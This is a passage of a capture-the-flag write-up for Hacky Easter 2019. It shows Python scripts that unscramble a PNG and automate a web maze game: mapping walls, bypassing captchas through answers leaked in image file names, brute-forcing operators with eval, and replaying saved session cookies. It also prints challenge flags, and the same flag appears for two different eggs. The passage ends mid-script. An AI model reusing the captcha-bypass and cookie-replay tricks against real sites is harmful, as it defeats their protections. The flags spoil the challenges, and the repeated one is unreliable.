egg\negg: PNG image data, 480 x 480, 8-bit\/color RGBA, non-interlaced\n<\/pre><\/div>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg19_03.png\" 
width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-NUSm-dv5t-thFy-XVMV<\/span>.\n<br\/>\n<h1 id=\"chlg20\">20 &#8211; Scrambled Egg<\/h1>\nThe challenge provides the following image:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg20_01.png\" \/>\n<br\/>\n<br\/>Obviously we have to <i>unscramble<\/i> the image in order to restore the egg. The challenge here was rather to find out <b>what<\/b> needs to be done than how it can be done.\n<br\/>\n<br\/>The first thing which felt a little bit odd is the resolution of the image:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [20]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg20# exiftool egg.png\nExifTool Version Number         : 11.16\nFile Name                       : egg.png\nDirectory                       : .\nFile Size                       : 60 kB\nFile Modification Date\/Time     : 2019:01:14 02:00:04-05:00\nFile Access Date\/Time           : 2019:06:03 04:18:22-04:00\nFile Inode Change Date\/Time     : 2019:06:03 04:18:22-04:00\nFile Permissions                : rw-r--r--\nFile Type                       : PNG\nFile Type Extension             : png\nMIME Type                       : image\/png\nImage Width                     : 259\nImage Height                    : 256\nBit Depth                       : 8\nColor Type                      : RGB with Alpha\nCompression                     : Deflate\/Inflate\nFilter                          : Adaptive\nInterlace                       : Noninterlaced\nImage Size                      : 259x256\nMegapixels                      : 0.066\n<\/pre><\/div>\n<br\/>The resolution is <code>259x256<\/code>, i.e. three columns more than a square 256x256 image. 
This will make sense later.\n<br\/>\n<br\/>I started by writing a Python script which prints out all pixel values line by line:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nfrom PIL import Image\n\nimg = Image.open(&#039;egg.png&#039;)\npix = img.load()\n\n# iterate row by row (h), then column by column (w)\nfor h in range(img.size&#x5B;1]):\n  for w in range(img.size&#x5B;0]):\n    p = pix&#x5B;w,h]\n    print(p)\n\n<\/pre><\/div>\n<br\/>Browsing through the output, three odd pixels can be recognized in each line of the image:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [15,25,36]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg20# .\/inspect.py\n(1, 1, 207, 255)\n(1, 1, 207, 255)\n(1, 1, 207, 255)\n(1, 1, 205, 255)\n(1, 1, 205, 255)\n(1, 1, 205, 255)\n(1, 1, 205, 255)\n(1, 1, 205, 255)\n(1, 1, 205, 255)\n(1, 1, 203, 255)\n(1, 1, 203, 255)\n(1, 1, 203, 255)\n(1, 1, 203, 255)\n(0, 23, 0, 0)\n(1, 1, 201, 255)\n(1, 1, 201, 255)\n(1, 1, 201, 255)\n(1, 1, 201, 255)\n(1, 1, 201, 255)\n(1, 1, 199, 255)\n(1, 1, 199, 255)\n(1, 1, 199, 255)\n(1, 1, 199, 255)\n(23, 0, 0, 0)\n(1, 1, 199, 255)\n(1, 1, 199, 255)\n(1, 1, 199, 255)\n...\n(233, 197, 1, 255)\n(233, 197, 1, 255)\n(233, 197, 1, 255)\n(233, 197, 1, 255)\n(233, 195, 1, 255)\n(233, 195, 1, 255)\n(0, 0, 23, 0)\n...\n<\/pre><\/div>\n<br\/>Each line of the image contains three pixels whose alpha value is <code>0<\/code>. In each of them only one of the other values (<code>R<\/code>, <code>G<\/code> or <code>B<\/code>) is set; the remaining two are also <code>0<\/code>. 
The one value which is not zero is the same for all three marker pixels of a line, i.e. it is a value assigned per line of the image:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg20# .\/inspect.py | grep &#039;0)&#039;\n(0, 23, 0, 0)\n(23, 0, 0, 0)\n(0, 0, 23, 0)\n(0, 214, 0, 0)\n(214, 0, 0, 0)\n(0, 0, 214, 0)\n(0, 0, 175, 0)\n(0, 175, 0, 0)\n(175, 0, 0, 0)\n(223, 0, 0, 0)\n(0, 223, 0, 0)\n(0, 0, 223, 0)\n(0, 53, 0, 0)\n(53, 0, 0, 0)\n(0, 0, 53, 0)\n(0, 0, 46, 0)\n(46, 0, 0, 0)\n...\n<\/pre><\/div>\n<br\/>After thinking about those pixels for a while, I assumed that the specific value of a line determines where this line of the image should actually be. This would mean that we just have to reorder the lines:\n<br\/>\n<br\/>Before:\n<br\/>\n<br\/><code>[--- line 23 ---]\n<br\/>[--- line 214 ---]\n<br\/>[--- line 175 ---]\n<br\/>[--- line 223 ---]\n<br\/>[--- line 53 ---]\n<br\/>...<\/code>\n<br\/>\n<br\/>Afterwards:\n<br\/>\n<br\/><code>[--- line 1 ---]\n<br\/>[--- line 2 ---]\n<br\/>[--- line 3 ---]\n<br\/>[--- line 4 ---]\n<br\/>[--- line 5 ---]\n<br\/>...<\/code>\n<br\/>\n<br\/>The harder part was to figure out how the colors within a single line of the image were mixed up. By comparing the RGB values with the values of a valid red egg, it seemed to me that the channels (<code>RGB<\/code>) had been shifted.\n<br\/>\n<br\/>Also, the three marker pixels within each line are always at different positions, and only one value (<code>R<\/code>, <code>G<\/code> or <code>B<\/code>) is actually set in each of them. Now this makes sense! The position of such a pixel within a line determines by how many positions the corresponding channel has been shifted. 
For example a shift could look like this:\n<br\/>\n<br\/><code>R: [4 5 6 7 8 9 0 1 2 3 ...]\n<br\/>G: [1 2 3 4 5 6 7 8 9 0 ...]\n<br\/>B: [7 8 9 0 1 2 3 4 5 6 ...]<\/code>\n<br\/>\n<br\/>Thus we have to revert the shifting:\n<br\/>\n<br\/><code>R: [0 1 2 3 4 5 6 7 8 9 ...]\n<br\/>G: [0 1 2 3 4 5 6 7 8 9 ...]\n<br\/>B: [0 1 2 3 4 5 6 7 8 9 ...]<\/code>\n<br\/>\n<br\/>The following Python script carries out both of the mentioned steps: it collects the colour channels of a line without the three marker pixels, rotates each channel back by the position of its marker and finally puts the lines into the order given by the marker value:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nfrom PIL import Image\n\nimg = Image.open(&#039;egg.png&#039;)\npix = img.load()\n\nline_map = {}\n\nfor h in range(img.size&#x5B;1]):\n  r=&#x5B;]; g=&#x5B;]; b=&#x5B;]\n  r_idx=0; g_idx=0; b_idx=0;\n  line_num=0\n  for w in range(img.size&#x5B;0]):\n    p = pix&#x5B;w,h]\n    if (p&#x5B;3] == 0):\n      # special pixel (alpha == 0): its value is the target line number,\n      # its position is the shift of the channel that is set\n      line_num = p&#x5B;0]+p&#x5B;1]+p&#x5B;2]\n      if (p&#x5B;0] &gt; 0)  : r_idx = w\n      elif (p&#x5B;1] &gt; 0): g_idx = w\n      elif (p&#x5B;2] &gt; 0): b_idx = w\n    else:\n      r.append(p&#x5B;0])\n      g.append(p&#x5B;1])\n      b.append(p&#x5B;2])\n\n  # processed one line of the image: 259 - 3 marker pixels = 256 real pixels\n  line_map&#x5B;line_num] = &#x5B;]\n  for i in range(256):\n    line_map&#x5B;line_num].append( (r&#x5B;(i+r_idx)%256], g&#x5B;(i+g_idx)%256], b&#x5B;(i+b_idx)%256]) )\n\n# reorder lines\nnew_pixels = &#x5B;]\nfor i in range(256): new_pixels += line_map&#x5B;i]\n\nimg_new = Image.new(&#039;RGB&#039;, (256, 256))\nimg_new.putdata(new_pixels)\nimg_new.save(&#039;egg_out.png&#039;)\n<\/pre><\/div>\n<br\/>Running the script:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg20# .\/unscrambleEgg.py\n<\/pre><\/div>\n<br\/>&#8230; creates a new file <code>egg_out.png<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" 
src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg20_02.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-NUSm-dv5t-thFy-XVMV<\/span>.\n<br\/>\n<h1 id=\"chlg21\">21 &#8211; The Hunt: Misty Jungle<\/h1>\nAfter choosing the path <code>Misty-Jungle<\/code> on the challenge website, the first relevant information can be found here:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_01.png\" width=\"800\"\/>\n<br\/>\n<br\/>It turned out that each character of the string has simply been shifted by <code>1<\/code>. Thus we can subtract <code>1<\/code> from each character to obtain the original string:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n&#x5B;GCC 8.3.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; s = &#039;``bqq`vsm``0npwf0y0z&#039;\n&gt;&gt;&gt; r = &#039;&#039;\n&gt;&gt;&gt; for c in s: r += chr(ord(c)-1)\n...\n&gt;&gt;&gt; r\n&#039;__app_url__\/move\/x\/y&#039;\n<\/pre><\/div>\n<br\/>\n<br\/>Accordingly the string is <code>__app_url__\/move\/x\/y<\/code>, which tells us how we can move.\n<br\/>\n<br\/>After clicking on <code>I'm ready!<\/code> we get to the following page:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_02.png\" width=\"600\"\/>\n<br\/>\n<br\/>Knowing how to move, we can for example append <code>\/move\/1\/0<\/code> to the URL in order to move to the right:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_03.png\" width=\"600\"\/>\n<br\/>\n<br\/>There is obviously a wall to our right. 
Moving up (<code>\/move\/0\/-1<\/code>) does work, though:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_04.png\" width=\"600\"\/>\n<br\/>\n<br\/>In order to expose all walls of the maze, I wrote the following Python script (the explored field is persisted to a text file so that a later run can continue from it):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nimport requests\nimport readchar\n\ndef move(s,d):\n  if (d == &#039;d&#039;): url_d = &#039;1\/0&#039;\n  elif (d == &#039;a&#039;): url_d = &#039;-1\/0&#039;\n  elif (d == &#039;w&#039;): url_d = &#039;0\/-1&#039;\n  elif (d == &#039;s&#039;): url_d = &#039;0\/1&#039;\n  return s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/move\/&#039;+url_d)\n\ndef dirToCoord(d):\n  if (d == &#039;d&#039;): return (1,0)\n  elif (d == &#039;a&#039;): return (-1,0)\n  elif (d == &#039;w&#039;): return (0,-1)\n  elif (d == &#039;s&#039;): return (0,1)\n\ndef printField(f):\n  for i in range(SIZE-1):\n    for j in range(SIZE-1):\n      print(f&#x5B;j]&#x5B;i]),\n    print(&#039;&#039;)\n  saveField(f, SIZE)\n\ndef loadField(f):\n  # restore a previously saved field; the player marker &#039;o&#039; is not restored\n  try:\n    lines = open(&#039;field_&#039;+str(SIZE)+&#039;.txt&#039;).read().split(&#039;\\n&#039;)\n    i = 0\n    lines = lines&#x5B;:-1]\n    for line in lines:\n      j = 0\n      for val in line.split(&#039;,&#039;):\n        if (val != &#039;o&#039;):\n          f&#x5B;i]&#x5B;j] = val\n        j += 1\n      i += 1\n  except: pass\n\ndef saveField(f, s):\n  pFile = open(&#039;field_&#039;+str(SIZE)+&#039;.txt&#039;,&#039;w&#039;)\n  for i in range(SIZE-1):\n    line = &#039;&#039;\n    for j in range(SIZE-1):\n      line += str(f&#x5B;i]&#x5B;j])+&#039;,&#039;\n    pFile.write(line&#x5B;:-1]+&#039;\\n&#039;)\n  pFile.close()\n\n\n\ns = 
requests.Session()\n\ns.get(&#039;http:\/\/whale.hacking-lab.com:5337\/1804161a0dabfdcd26f7370136e0f766&#039;)\ns.get(&#039;http:\/\/whale.hacking-lab.com:5337\/&#039;)\n\nfield = &#x5B;]\nSIZE = 57\n\n\nfor i in range(SIZE-1):\n  field.append(&#x5B;])\n  for j in range(SIZE-1):\n    field&#x5B;i].append(&#039; &#039;)\n\ncurp = (len(field)\/2,len(field)\/2)\n\nloadField(field)\nfield&#x5B;curp&#x5B;0]]&#x5B;curp&#x5B;1]] = &#039;o&#039;\nprintField(field)\n\nwhile True:\n  while True:\n    direction = readchar.readchar()\n    if (direction == &#039;x&#039;): quit()\n    if (direction == &#039;p&#039;): print(s.cookies.get_dict())\n    if (direction in &#039;wasd&#039;): break\n  resp = move(s, direction).text\n  dtc = dirToCoord(direction)\n  if (&#039;Ouch! You would hit a wall.&#039; in resp):\n    field&#x5B;curp&#x5B;0]+dtc&#x5B;0]]&#x5B;curp&#x5B;1]+dtc&#x5B;1]] = &#039;X&#039;\n  else:\n    field&#x5B;curp&#x5B;0]]&#x5B;curp&#x5B;1]] = &#039; &#039;\n    curp = (curp&#x5B;0] + dtc&#x5B;0], curp&#x5B;1] + dtc&#x5B;1])\n    field&#x5B;curp&#x5B;0]]&#x5B;curp&#x5B;1]] = &#039;o&#039;\n  printField(field)\n  if (&#039;&lt;h3 style=&quot;margin-bottom:-5px&quot;&gt;&#039; in resp):\n    h3 = resp&#x5B;resp.index(&#039;&lt;h3 style=&quot;margin-bottom:-5px&quot;&gt;&#039;)+4:]\n    h3 = h3&#x5B;:h3.index(&#039;&lt;\/h3&gt;&#039;)]\n    print(&#039;--&gt; &#039; + h3)\n<\/pre><\/div>\n<br\/>\n<br\/>This script can be used to move around in the maze and find walls (<code>Ouch! You would hit a wall.<\/code>) as well as challenges (usually enclosed in a <code>&lt;h3&gt;<\/code> tag). 
It can also be used to print the current session cookie by pressing <code>p<\/code>, in order to reuse this session within a browser to solve a task manually.\n<br\/>\n<br\/>Based on the output of the script, I created the following map:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_05.png\" width=\"600\"\/>\n<br\/>\n<br\/>One very important aspect of this challenge (also true for <a href=\"#chlg22\">egg22<\/a>) is that the whole state of the game is stored in the user&#8217;s session cookie. This means that we don&#8217;t have to repeatedly solve the individual tasks, but can simply save the session cookie after having solved a task and always use this saved cookie as a starting point for the next one. Once we have solved another task, we save that session cookie and proceed with the next task, and so forth.\n<br\/>\n<br\/>So let&#8217;s have a look at the individual tasks:\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Warmup<\/h3>\n<br\/>This is the very first task we have to solve:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_06.png\" width=\"700\"\/>\n<br\/>\n<br\/>The picture on the left is a static picture (<code>c11.png<\/code>). The picture on the right is dynamically created and contains a few pixels which differ from the static image. 
We only have to find those differing pixels and submit their coordinates:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nfrom PIL import Image\n\ndef solveChallenge11():\n  img1 = Image.open(&#039;c11\/c11.png&#039;)\n  pix1 = img1.load()\n  img2 = Image.open(&#039;c11\/img.png&#039;)\n  pix2 = img2.load()\n\n  # collect the coordinates of all differing pixels as a JSON-style list\n  res = &#039;&#x5B;&#039;\n  for w in range(img1.size&#x5B;0]):\n    for h in range(img1.size&#x5B;1]):\n      if (pix1&#x5B;w,h] != pix2&#x5B;w,h]):\n        res += &#039;&#x5B;&#039;+str(w)+&#039;,&#039;+str(h)+&#039;], &#039;\n  res = res&#x5B;:-2]+&#039;]&#039;\n  return res\n\nresp = # ... contains html code of task website ...\nfind1 = &#039;&lt;img src=&quot;..\/..\/static\/img\/ch11\/challenges\/&#039;\nimg = resp&#x5B;resp.index(find1)+len(find1):]\nimg = img&#x5B;:img.index(&#039;&quot;&gt;&#039;)]\n# download image!\nimgUrl = &#039;http:\/\/whale.hacking-lab.com:5337\/static\/img\/ch11\/challenges\/&#039;+img\nimgDownload = s.get(imgUrl).content\nf = open(&#039;c11\/img.png&#039;, &#039;wb&#039;)\nf.write(imgDownload)\nf.close()\nres = solveChallenge11()\nresp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?pixels=&#039;+res).text\nif (&#039;You solved it!&#039; in resp): print(&#039;solved c11!&#039;)\nelse:\n  print(&#039;failure solving c11&#039;)\n  quit()\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">C0tt0nt4il Ch3ck<\/h3>\n<br\/>This task requires the user to solve 10 equations in time:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_07.png\" width=\"700\"\/>\n<br\/>\n<br\/>This task really took me some time. I figured out that the number of different pictures is quite limited. Thus I wrote a little script which downloaded all the different images and prompted me to manually enter the result. 
I stored the solutions in a text file. Notice that the third dash-separated group of each file name equals the result, so the server actually leaks the answer in the image name:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21\/c12# cat sol.txt\na94e1283-de0c-142-879b-97d5764c4bb0.png,142\n7230c105-78be-77-900d-af88e24804dc.png,77\ne6cd83d0-cf6b-142-8989-489bc9742630.png,142\n3e1785d4-f44f-92-8d4c-d9f9cb6c529d.png,92\n788116b2-591a-107-85c5-c4c273e74ea6.png,107\n0f41dcad-1774-74-970b-257da9e7cc6a.png,74\n11f1a7bd-6e36-71-9003-cdbde3133213.png,71\n487f71d7-57fd-87-bb59-4141ef304261.png,87\n459bb71e-8a2c-5-8ab7-3497476614e4.png,5\n3ea51eb7-b92e-47-b393-6528daa628cd.png,47\n84a604ef-0948-90-96a1-5f8df8c3ad57.png,90\n6b9dbe13-a072-148-bd18-9e25f95bc32a.png,148\n<\/pre><\/div>\n<br\/>\n<br\/>Now this file can be used to automatically solve the 10 equations in time:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n# map image file name -&gt; known result\nresult_map = {}\nlines = open(&#039;c12\/sol.txt&#039;).read().split(&#039;\\n&#039;)\nfor line in lines:\n  line = line.strip()\n  if (len(line) == 0): continue\n  imgName = line.split(&#039;,&#039;)&#x5B;0]\n  res = line.split(&#039;,&#039;)&#x5B;1]\n  result_map&#x5B;imgName] = res\n\ndef solveChallenge12(s, resp):\n  solvedCnt = 0\n  while True:\n    if (&#039;Your journey ends here.&#039; in resp): return False\n    find1 = &#039;&lt;img id=&quot;captcha&quot; src=&quot;static\/img\/ch12\/challenges\/&#039;\n    img = &#039;&#039;\n    try:\n      img = resp&#x5B;resp.index(find1)+len(find1):]\n    except: return False\n    img = img&#x5B;:img.index(&#039;&quot;&gt;&#039;)]\n    if (img in result_map):\n      solvedCnt += 1\n      print(&#039;found image in map: &#039;+str(solvedCnt))\n      resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?result=&#039;+result_map&#x5B;img]).text\n    else:\n      return False\n    if (solvedCnt == 10 and &#039;Check successful!&#039; in resp):\n      return True\n\nif 
(solveChallenge12(s, resp)): print(&#039;solved c12!&#039;)\nelse:\n  print(&#039;failure solving c12&#039;)\n  quit()\n\n\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Mathonymous<\/h3>\n<br\/>This task requires us to determine the mathematical operations within an equation:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_08.png\" width=\"700\"\/>\n<br\/>\n<br\/>In order to solve this task, I extracted the numbers from the equation and brute-forced the possible operations, using <code>eval<\/code> to calculate the result:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge13(s, resp):\n  find1 = &#039;&lt;td&gt;&lt;code style=&quot;font-size: 1em; margin: 10px&quot;&gt;&#039;\n  vals = &#x5B;]\n  vals_tmp = resp\n  for i in range(6):\n    vals_tmp = vals_tmp&#x5B;vals_tmp.index(find1)+len(find1):]\n    vals.append(vals_tmp&#x5B;:vals_tmp.index(&#039;&lt;\/code&gt;&#039;)])\n\n  print(vals)\n  find1 = &#039;&lt;td&gt;&lt;code style=&quot;font-size: 1em&quot;&gt;=&#039;\n  vals_tmp = vals_tmp&#x5B;vals_tmp.index(find1)+len(find1):]\n  vals_res = vals_tmp&#x5B;:vals_tmp.index(&#039;&lt;\/code&gt;&#039;)]\n  print(vals_res)\n\n  ops = &#x5B;&#039;+&#039;,&#039;-&#039;,&#039;*&#039;,&#039;\/&#039;]\n  for op1 in ops:\n    for op2 in ops:\n      for op3 in ops:\n        for op4 in ops:\n          for op5 in ops:\n            eq = &#039;float(&#039;+vals&#x5B;0]+&#039;)&#039;+op1+&#039;float(&#039;+vals&#x5B;1]+&#039;)&#039;+op2+&#039;float(&#039;+vals&#x5B;2]+&#039;)&#039;+op3+&#039;float(&#039;+vals&#x5B;3]+&#039;)&#039;+op4+&#039;float(&#039;+vals&#x5B;4]+&#039;)&#039;+op5+&#039;float(&#039;+vals&#x5B;5]+&#039;)&#039;\n            res = eval(eq)\n            if (float(vals_res)-0.01 &lt; res &lt; float(vals_res)+0.01):\n              op1 = 
op1.replace(&#039;+&#039;,&#039;%2b&#039;).replace(&#039;-&#039;,&#039;%2d&#039;).replace(&#039;*&#039;,&#039;%2a&#039;).replace(&#039;\/&#039;,&#039;%2f&#039;)\n              op2 = op2.replace(&#039;+&#039;,&#039;%2b&#039;).replace(&#039;-&#039;,&#039;%2d&#039;).replace(&#039;*&#039;,&#039;%2a&#039;).replace(&#039;\/&#039;,&#039;%2f&#039;)\n              op3 = op3.replace(&#039;+&#039;,&#039;%2b&#039;).replace(&#039;-&#039;,&#039;%2d&#039;).replace(&#039;*&#039;,&#039;%2a&#039;).replace(&#039;\/&#039;,&#039;%2f&#039;)\n              op4 = op4.replace(&#039;+&#039;,&#039;%2b&#039;).replace(&#039;-&#039;,&#039;%2d&#039;).replace(&#039;*&#039;,&#039;%2a&#039;).replace(&#039;\/&#039;,&#039;%2f&#039;)\n              op5 = op5.replace(&#039;+&#039;,&#039;%2b&#039;).replace(&#039;-&#039;,&#039;%2d&#039;).replace(&#039;*&#039;,&#039;%2a&#039;).replace(&#039;\/&#039;,&#039;%2f&#039;)\n              resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?op=&#039;+op1+op2+op3+op4+op5).text\n              if (&#039;You solved it!&#039; in resp): return True\n              else: return False\n  return False\n\nif (solveChallenge13(s, resp)): print(&#039;solved c13!&#039;)\nelse:\n  print(&#039;failure solving c13!&#039;)\n  quit()\n\n<\/pre><\/div>\n<br\/>\n<br\/>Actually an automated bruteforce script is not necessary, as it suffices to solve this task manually once (and use the session cookie as a saved state).\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Mysterious Circle<\/h3>\n<br\/>When we enter the mysterious circle before having solved the three challenges, we see the following page:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_09.png\" width=\"700\"\/>\n<br\/>\n<br\/>After having solved all three challenges, we don&#8217;t see this message again when stepping on the mysterious circle:\n<br\/>\n<br\/><img decoding=\"async\" 
src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_10.png\" width=\"700\"\/>\n<br\/>\n<br\/>The message from the <code>Navigator<\/code> states: <code>Something strange happened. You seem to be at a complete different place<\/code>.\n<br\/>\n<br\/>As it turned out, the mysterious circle teleported us to another maze. Using the saved session cookie, we can reuse the script from above to expose this new maze. Based on the output, I created the following map:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_12.png\" width=\"700\"\/>\n<br\/>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Pumple&#8217;s Puzzle<\/h3>\n<br\/>In the first task of the second map we have to assign different attributes to five bunnies based on 16 statements:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_13.png\" width=\"700\"\/>\n<br\/>\n<br\/>I solved this task by hand on a sheet of paper by simply eliminating possible attributes based on the individual statements until every attribute was explicitly assigned to a bunny.\n<br\/>\n<br\/>At first I did not simply reuse the session cookie and thus needed to solve each task a few times. With this task the assignment changes every time the task is reloaded. However, the change is only a bijective renaming of the attributes, so the values can simply be substituted. 
Thus I wrote the following script to solve the task automatically based on my one-time paper sheet solution:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge14(s, resp):\n  print(resp)\n  x = re.findall(&#039;&lt;pre class=&quot;mb-2&quot;&gt;(.+)&lt;\/pre&gt;&#039;, resp)\n  pres = x&#x5B;1:]\n\n  # manual paper sheet solution\n  b1_name=&#039;Bunny&#039;; b2_name=&#039;Midnight&#039;; b3_name=&#039;Thumper&#039;; b4_name=&#039;Snowball&#039;; b5_name=&#039;Angel&#039;\n  b1_clr=&#039;Red&#039;; b2_clr=&#039;White&#039;; b3_clr=&#039;Yellow&#039;; b4_clr=&#039;Green&#039;; b5_clr=&#039;Blue&#039;\n  b1_char=&#039;Attractive&#039;; b2_char=&#039;Handsome&#039;; b3_char=&#039;Lovely&#039;; b4_char=&#039;Funny&#039;; b5_char=&#039;Scared&#039;\n  b1_sign=&#039;Pisces&#039;; b2_sign=&#039;Virgo&#039;; b3_sign=&#039;Aquarius&#039;; b4_sign=&#039;Capricon&#039;; b5_sign=&#039;Taurus&#039;\n  b1_pattern=&#039;One-coloured&#039;; b2_pattern=&#039;Striped&#039;; b3_pattern=&#039;Chequered&#039;; b4_pattern=&#039;Dotted&#039;; b5_pattern=&#039;Camouflaged&#039;\n\n  # the statement templates stay the same, only the attribute names are permuted,\n  # so each template tells which bunny slot the captured names belong to\n  x = re.search(&#039;The backpack of (&#x5B;a-zA-Z\\-]+) is (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;0])\n  b1_name = x.group(1).capitalize()\n  b3_clr = x.group(2).capitalize()\n  x = re.search(&#039;(&#x5B;a-zA-Z\\-]+)\\&#039;s star sign is (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;1])\n  b5_name = x.group(1).capitalize()\n  b5_sign = x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) backpack is also (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;2])\n  b4_pattern=x.group(1).capitalize()\n  b4_clr=x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) backpack by (&#x5B;a-zA-Z\\-]+) was expensive.&#039;, pres&#x5B;3])\n  b2_pattern=x.group(1).capitalize()\n  b2_name=x.group(2).capitalize()\n  x = re.search(&#039;The bunny with the (&#x5B;a-zA-Z\\-]+) backpack sits next to the bunny with the 
(&#x5B;a-zA-Z\\-]+) backpack, on the left.&#039;, pres&#x5B;4])\n  b4_clr=x.group(1).capitalize()\n  b5_clr=x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) is also (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;5])\n  b3_sign=x.group(1).capitalize()\n  b3_char=x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) bunny has a (&#x5B;a-zA-Z\\-]+) backpack.&#039;, pres&#x5B;6])\n  b1_char=x.group(1).capitalize()\n  b1_clr=x.group(2).capitalize()\n  x = re.search(&#039;The bunny with the (&#x5B;a-zA-Z\\-]+) backpack sits in the middle.&#039;, pres&#x5B;7])\n  b3_pattern=x.group(1).capitalize()\n  x = re.search(&#039;(&#x5B;a-zA-Z\\-]+) is the first bunny.&#039;, pres&#x5B;8])\n  b1_name=x.group(1).capitalize()\n  x = re.search(&#039;The bunny with a (&#x5B;a-zA-Z\\-]+) backpack sits next to the (&#x5B;a-zA-Z\\-]+) bunny.&#039;, pres&#x5B;9])\n  b1_pattern=x.group(1).capitalize()\n  b2_char=x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) bunny sits also next to the (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;10])\n  b2_char=x.group(1).capitalize()\n  b1_sign=x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) bunny sits next to the (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;11])\n  b1_char=x.group(1).capitalize()\n  b2_sign=x.group(2).capitalize()\n  x = re.search(&#039;The backpack of the (&#x5B;a-zA-Z\\-]+) bunny is (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;12])\n  b5_char=x.group(1).capitalize()\n  b5_pattern=x.group(2).capitalize()\n  x = re.search(&#039;(&#x5B;a-zA-Z\\-]+) is a (&#x5B;a-zA-Z\\-]+) bunny.&#039;, pres&#x5B;13])\n  